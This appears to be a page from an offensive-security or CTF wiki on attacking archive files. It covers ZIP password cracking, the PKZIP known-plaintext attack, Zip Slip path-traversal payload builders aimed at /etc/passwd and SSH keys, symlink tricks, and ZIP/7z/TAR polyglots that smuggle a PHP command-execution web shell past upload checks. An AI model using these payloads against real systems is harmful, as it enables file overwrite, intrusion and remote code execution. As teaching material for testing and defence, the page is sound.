Archives

Different kinds of file archives, like ZIP, RAR or TAR

File format

Sometimes a zip file can be corrupted, either intentionally or unintentionally. You can try to fix it using the -FF flag in zip:

$ zip -FF archive.zip --out fixed.zip

Sometimes binwalk can also help with finding files in the ZIP when unzip cannot.

When you suspect some kind of file trickery you should look at the file format, and find things that are weird about this ZIP file.

Password Protection

Most types of archive files can set a password that encrypts the content until the correct password is given. There are a few tricks to brute-force or even bypass this password protection.

Brute-forcing

I spent a lot of time automating the cracking of password-protected archives in my default tool:

$ default crack archive.zip

It will automatically recognize the type of encryption used and start hashcat or john to crack it using a wordlist.

Doing it manually would require you to first get a hash using a tool like zip2john included in John the Ripper. Then you crack that hash with hashcat or john if you have the right hash mode.

Read filenames

An interesting little thing about most archive file formats is the fact that when they are encrypted, you can still read the filenames and structure, only the content is encrypted. This can already give a good idea of what kind of files the archive contains.

$ unzip -v archive.zip
Archive:  archive.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
      15  Stored       15   0% 1970-01-01 00:00 21c0cb62  file.txt
--------          -------  ---                            -------
      15               15   0%                            1 file

As you can see, even the size and a CRC32 are present. This CRC is a checksum of the unencrypted file content, so if you can guess the content, you can confirm the guess by computing its CRC32 and comparing the two values. This also allows brute-forcing the content of very small files. See this tool for an implementation of that:
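
As a minimal sketch of the idea (not the tool referenced above), the CRC check can be reproduced with Python's standard library. The helper names `entry_metadata` and `brute_force_crc`, the candidate alphabet, and the stand-in archive are assumptions made for illustration; the demo archive is unencrypted only because `zipfile` cannot create encrypted archives, and the metadata is read the same way.

```python
import io
import itertools
import string
import zipfile
import zlib


def entry_metadata(zip_bytes):
    """Return (name, size, crc, encrypted) per entry, without any password."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        return [
            (info.filename, info.file_size, info.CRC, bool(info.flag_bits & 0x1))
            for info in archive.infolist()
        ]


def brute_force_crc(size, crc, alphabet=string.ascii_lowercase + string.digits):
    """Yield every candidate of exactly `size` bytes whose CRC32 matches."""
    for chars in itertools.product(alphabet.encode(), repeat=size):
        candidate = bytes(chars)
        if zlib.crc32(candidate) == crc:
            yield candidate


# Stand-in archive holding a 3-byte secret (hypothetical example data).
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as archive:
    archive.writestr("pin.txt", "k3y")

name, size, crc, encrypted = entry_metadata(buf.getvalue())[0]
matches = list(brute_force_crc(size, crc))
print(name, size, hex(crc), matches)
```

The search space grows exponentially with the file size, so this is only practical for contents of a few bytes or a very restricted alphabet.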

ZIP Known Plaintext Attack

The PKZIP stream cipher is vulnerable to a Known Plaintext attack. This means that if we know some content of a file in the encrypted ZIP, we can use it to find the keys used to decrypt the rest.
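
To see why known content is so damaging, the following sketch re-implements the legacy cipher's key schedule and shows that XORing ciphertext with known plaintext reveals the keystream bytes, which is the starting point for recovering the internal keys. The class name `ZipCrypto` and the sample data are made up for illustration, and the sketch leaves out the 12-byte random header that real archives prepend to each entry, so it illustrates the cipher rather than replacing a real tool.

```python
import zlib


def _crc32_step(crc, byte):
    # One raw CRC32 table update (undo zlib's pre/post inversion).
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class ZipCrypto:
    """Illustrative model of the legacy PKZIP stream cipher."""

    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for byte in password:
            self._update(byte)

    def _update(self, plain_byte):
        # The three keys are advanced with each *plaintext* byte.
        self.k0 = _crc32_step(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


plaintext = b'<?xml version="1.0" encoding="UTF-8"?><secret>42</secret>'
ciphertext = ZipCrypto(b"hunter2").encrypt(plaintext)

# An attacker who guesses the XML header learns the matching keystream bytes.
known = b'<?xml version="1.0"'
keystream = bytes(c ^ p for c, p in zip(ciphertext, known))
print(keystream.hex())
```

The keystream depends only on the internal key state, so enough recovered keystream bytes constrain that state without ever knowing the password.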

With a faster brute-force attack afterward it is also possible to recover the original password for further use.

The bkcrack tool has a great implementation of this attack, see the tutorial here on how to use it:

Zip Slip Vulnerability

When creating your own archives that some target processes, you can include malicious filenames like ../../../../etc/passwd to overwrite or create files outside the intended extraction directory. This vulnerability can exist when an application has an import feature or automatically extracts archives you upload.

While the most common format is ZIP, this vulnerability exists in many more archive types, such as .tar, .jar, .war, .cpio, .apk, .rar or .7z.

Entry names in a ZIP file may contain directory components, because an archive can hold folders. The unexpected part is that they may also contain ../ sequences, with no limit on how many. Most popular extraction functions in libraries are safe because they explicitly normalize or reject such paths, but custom implementations may well be vulnerable:

Java
Enumeration<ZipEntry> entries = zip.getEntries();
while (entries.hasMoreElements()) { 
    ZipEntry e = entries.nextElement(); 
    File f = new File(destinationDir, e.getName()); 
    InputStream input = zip.getInputStream(e);
    IOUtils.copy(input, write(f));
}

The main pattern to look out for is:

  1. Looping through the elements

  2. Concatenating the target directory with the filename directly
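
For contrast, the kind of normalizing check that safe extractors perform can be sketched in a few lines of Python. The function name `is_within_directory` and the example paths are hypothetical; the point is only that the joined path is resolved first and then compared against the destination directory.

```python
import os


def is_within_directory(destination_dir, entry_name):
    """Return True if extracting entry_name stays inside destination_dir."""
    base = os.path.realpath(destination_dir)
    # Resolve ".." components (and existing symlinks) before comparing.
    target = os.path.realpath(os.path.join(base, entry_name))
    return os.path.commonpath([base, target]) == base


print(is_within_directory("/tmp/extract", "docs/readme.txt"))
print(is_within_directory("/tmp/extract", "../../../../etc/passwd"))
```

Code that concatenates the two paths without a check like this is the pattern described above.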

To test for and exploit such a vulnerability, simply create a file entry with a custom name:

Python (ZIP)
import zipfile  # ZIP

with zipfile.ZipFile("payload.zip", "w") as archive:
    #             source    name inside the archive
    archive.write("passwd", "../../../../etc/passwd")

Python (TAR)
import tarfile

with tarfile.open("zipslip.tar", "w") as archive:
    #           source    name inside the archive
    archive.add("passwd", "../../../../etc/passwd")

The above example will create a ZIP file payload.zip that, when extracted by a vulnerable application, will try to overwrite /etc/passwd with the content you choose. This can be useful for a Privilege Escalation scenario if root performs the extraction, but more commonly you'll want to get initial access by overwriting executable files like PHP shells, templates, dotfiles, or ~/.ssh/authorized_keys if SSH is enabled (see #writing-files for more details).
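
Before sending a payload, it can help to confirm that the traversal sequence really ended up in the archive. The sketch below is a self-contained variant that builds the archive in memory, so no local source file is needed, and reads the entry names back. The helper name `build_traversal_zip` and the harmless marker path are assumptions chosen for safe testing.

```python
import io
import zipfile


def build_traversal_zip(entry_name, content):
    """Build a ZIP in memory with a single entry stored under entry_name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(entry_name, content)
    return buf.getvalue()


payload = build_traversal_zip("../../../../tmp/zipslip-test.txt", b"harmless marker\n")

# Read the names back to confirm they were stored without normalization.
with zipfile.ZipFile(io.BytesIO(payload)) as archive:
    names = archive.namelist()
print(names)
```

Using a marker file in a writable location first is a low-risk way to prove the issue before targeting anything sensitive.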

Aside from directory traversal in filenames as shown above, most formats can also include symbolic links that point to another path. Most libraries and commands will correctly recognize and create these symlinks during extraction, but such special files can have unexpected side effects.

Processes afterward might read/write to this file but accidentally follow the symlink we created while doing so. This can result in arbitrary file read/write with multiple steps.

Tip: You can even include multiple file entries with the same name, allowing for even more complex attacks. See here for an example that writes a symlink, and then overwrites its contents from within the same TAR file
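
A minimal sketch of building such an archive with Python's tarfile module follows (an illustration of the idea, not the linked example). The helper name `build_symlink_overwrite_tar` and the target path are hypothetical, and whether the second entry is actually written through the link depends entirely on the extractor.

```python
import io
import tarfile


def build_symlink_overwrite_tar(link_name, link_target, content):
    """Build a TAR with a symlink entry followed by a file of the same name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as archive:
        # First entry: a symlink pointing outside the extraction directory.
        link = tarfile.TarInfo(name=link_name)
        link.type = tarfile.SYMTYPE
        link.linkname = link_target
        archive.addfile(link)

        # Second entry: a regular file reusing the exact same name.
        data = tarfile.TarInfo(name=link_name)
        data.size = len(content)
        archive.addfile(data, io.BytesIO(content))
    return buf.getvalue()


payload = build_symlink_overwrite_tar(
    "link", "/tmp/symlink-target.txt", b"written through the link\n"
)

with tarfile.open(fileobj=io.BytesIO(payload)) as archive:
    members = [(m.name, m.issym(), m.linkname) for m in archive.getmembers()]
print(members)
```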

ZIP

When using zip to include a symlink you made, it will by default follow the symlink and include the content of the file it is pointing to. This may be useful for Linux Privilege Escalation when an application zips a symlink you make locally, but in a scenario where it only extracts the file, you should keep the symlink intact inside the ZIP file using the --symlinks option:

$ ln -s /etc/passwd link        # Create symlink locally
$ zip --symlinks payload.zip *  # Add to new archive
$ unzip -p payload.zip link     # View to confirm symlink was added
/etc/passwd
$ 7z l -ba -slt payload.zip     # Attributes starting with "l" mean symlink
...
Attributes = _ lrwxrwxrwx
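
The same kind of entry can also be produced without touching the local filesystem. The sketch below marks an entry as a symlink through its Unix mode bits and stores the link target as the entry's content; the helper name `build_symlink_zip` is hypothetical, and how an extractor treats the entry still depends on the tool.

```python
import io
import stat
import zipfile


def build_symlink_zip(link_name, link_target):
    """Build a ZIP whose single entry is flagged as a Unix symlink."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3  # 3 = Unix, so the mode bits are honored
        # The upper 16 bits of external_attr hold the Unix file mode.
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        archive.writestr(info, link_target)  # content is the link target
    return buf.getvalue()


payload = build_symlink_zip("link", "/etc/passwd")

with zipfile.ZipFile(io.BytesIO(payload)) as archive:
    entry = archive.getinfo("link")
    is_symlink = stat.S_ISLNK(entry.external_attr >> 16)
    target = archive.read("link")
print(is_symlink, target)
```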

TAR

By default, the tar command will allow storing and extracting symlinks:

$ ln -s /etc/passwd link  # Create symlink locally
$ tar -cvf payload.tar *  # Add to new archive
$ tar -tvf payload.tar    # View to confirm symlink was added
lrwxrwxrwx user/user     0 2023-00-00 00:00 link -> /etc/passwd

Polyglots

A "polyglot" is defined in English as a person who speaks multiple languages. When talking about file formats, this means a file that can be interpreted in multiple ways. These are useful for various reasons, mainly confusing parsers. A check might use one parser, but when the file is actually used it is parsed differently, bypassing the check.

Archive files have a few interesting properties of flexibility that make it fairly straightforward to create one file that extracts in two different ways depending on the tool used to inspect/extract it.

To understand why tricks work and to come up with your own, look at the @corkami/pics repository which has simple but useful images for many file formats, including archives.

ZIP file extracting as 7z

When some code tries to validate a ZIP file before extracting it, there is a high chance you can make the check parse the file differently from the extraction. One such example is combining a ZIP file with 7z. This is possible because a ZIP file is parsed from the end, while a .7z file is parsed from the start, where it is recognized by its magic bytes.
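
The two detection strategies can be sketched side by side in Python. The helper names `looks_like_7z` and `find_zip_eocd` are hypothetical, and the prefix used here is only the 7z signature followed by padding, not a valid 7z archive; it merely shows that the two checks look at opposite ends of the file and can both succeed.

```python
import io
import zipfile

SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # expected at offset 0 of a .7z file
ZIP_EOCD_MAGIC = b"PK\x05\x06"          # ZIP end-of-central-directory record


def looks_like_7z(data):
    """Front-to-back detection: check the magic bytes at the start."""
    return data.startswith(SEVENZIP_MAGIC)


def find_zip_eocd(data):
    """Back-to-front detection: locate the last end-of-central-directory."""
    return data.rfind(ZIP_EOCD_MAGIC)


# Build a small ZIP in memory, then prepend unrelated bytes to it.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as archive:
    archive.writestr("file.txt", "dummy\n")
zip_bytes = buf.getvalue()
polyglot = SEVENZIP_MAGIC + b"\x00" * 64 + zip_bytes

print(looks_like_7z(polyglot), find_zip_eocd(polyglot))

# Python's zipfile also parses from the end and tolerates the prefix.
with zipfile.ZipFile(io.BytesIO(polyglot)) as archive:
    names = archive.namelist()
print(names)
```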

A useful tool that can help us with this is truepolyglot which has a zipany mode that can prefix a ZIP file with any content, and fix the offsets so it unzips without any errors. When we prefix a regular ZIP file with a 7z file, it will result in a special polyglot file that is a valid ZIP with some content, but 7z x extracts it with the .7z's content. This confusion may bypass some checks.

$ echo dummy > file.txt
$ zip file.zip file.txt  # Prepare ZIP (carrier)

$ echo '<?php system($_GET["cmd"]) ?>' > shell.php
$ 7z a shell.7z shell.php  # Prepare 7z (payload)

# Combine into polyglot file
$ truepolyglot zipany --payload1file shell.7z --zipfile file.zip polyglot.zip

This created a polyglot.zip file which has the properties described above, confusing ZIP parsers thinking it is an innocent file, but has different contents when extracting using 7z x:

$ unzip -l polyglot.zip  # Shows only file.txt
  Length      Date    Time    Name
---------  ---------- -----   ----
        8  2023-10-18 20:52   file.txt
---------                     -------
        8                     1 file
$ 7z x polyglot.zip  # Only warnings, no errors

WARNINGS:
There are data after the end of archive

WARNING:
polyglot.zip
Can not open the file as [zip] archive
The file is open as [7z] archive
...

Everything is Ok

Warnings: 1
Size:       30
Compressed: 328
$ ls -l  # Writes shell.php instead
-rw-r--r-- 1 j0r1an j0r1an 10414 Oct 18 21:04 polyglot.zip
-rw-r--r-- 1 j0r1an j0r1an    15 Oct 18 21:00 shell.php

ZIP magic bytes as TAR

In the previous trick, we learned that ZIP gets parsed from the end of the file. This bypasses most parsers and does not require the file to start with the ZIP magic bytes. In specific cases, however, this might not be enough, and you do need control over the start of the file, for example to set the ZIP magic bytes. The trick above would not work then, because the .7z format requires its own magic bytes at the start.

To solve this, TAR can be used, which does not require any magic bytes of its own at the start of the file. When you create a raw .tar file using tar -cf, you may notice that it immediately starts with the filename you added:

$ touch ABCDEFGH
$ tar -cf test.tar ABCDEFGH
$ hd test.tar 
00000000  41 42 43 44 45 46 47 48  00 00 00 00 00 00 00 00  |ABCDEFGH........|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...

This can be abused by naming the first file after the ZIP magic bytes, which TAR will happily parse as a filename. The archive then starts with exactly the bytes that a magic-byte check expects, and during extraction the rest of the files in the TAR are still extracted.
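
The same layout can be checked from Python. This sketch builds a TAR in memory whose first entry is named after the ZIP magic bytes and then inspects the raw bytes. The helper name `build_tar` and the placeholder file content are assumptions, and the USTAR format is selected explicitly so that no extra header block precedes the first filename.

```python
import io
import tarfile


def build_tar(entries):
    """Build a USTAR archive in memory from (name, content) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as archive:
        for name, content in entries:
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            archive.addfile(info, io.BytesIO(content))
    return buf.getvalue()


tar_bytes = build_tar([
    ("PK\x03\x04", b""),                           # empty file named like the ZIP magic
    ("shell.php", b"<?php /* placeholder */ ?>\n"),
])

print(tar_bytes[:4])       # first header field is the entry name
print(tar_bytes[257:262])  # TAR's own marker sits further into the header

with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as archive:
    names = archive.getnames()
print(names)
```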

$ echo 'dummy' > file.txt
$ zip file.zip file.txt  # Prepare ZIP (carrier)

$ echo '<?php system($_GET["cmd"]) ?>' > shell.php
$ touch $'PK\x03\x04'
$ tar -cf shell.tar $'PK\x03\x04' shell.php  # Prepare TAR (payload)

# Combine into polyglot file
$ truepolyglot zipany --payload1file shell.tar --zipfile file.zip polyglot.zip

The shell.tar file already starts with the correct magic bytes, and truepolyglot keeps them at the start of the final polyglot.zip file. The result has ZIP magic bytes, is a valid, parsable ZIP file, and at the same time is recognized as TAR by 7z. See the following demo:

$ head -c 4 polyglot.zip | hd  # Correct magic bytes
00000000  50 4b 03 04           |PK..|
00000004
$ unzip -l polyglot.zip  # Shows only file.txt
  Length      Date    Time    Name
---------  ---------- -----   ----
        8  2023-10-18 20:52   file.txt
---------                     -------
        8                     1 file
$ 7z x polyglot.zip  # Only warnings, no errors

WARNINGS:
There are data after the end of archive

WARNING:
polyglot.zip
Can not open the file as [zip] archive
The file is open as [tar] archive
...
Everything is Ok

Warnings: 1
Size:       15
Compressed: 10414
$ ls -l  # Writes shell.php instead
-rw-r--r-- 1 j0r1an j0r1an 10414 Oct 18 21:04 polyglot.zip
-rw-r--r-- 1 j0r1an j0r1an    15 Oct 18 21:00 shell.php
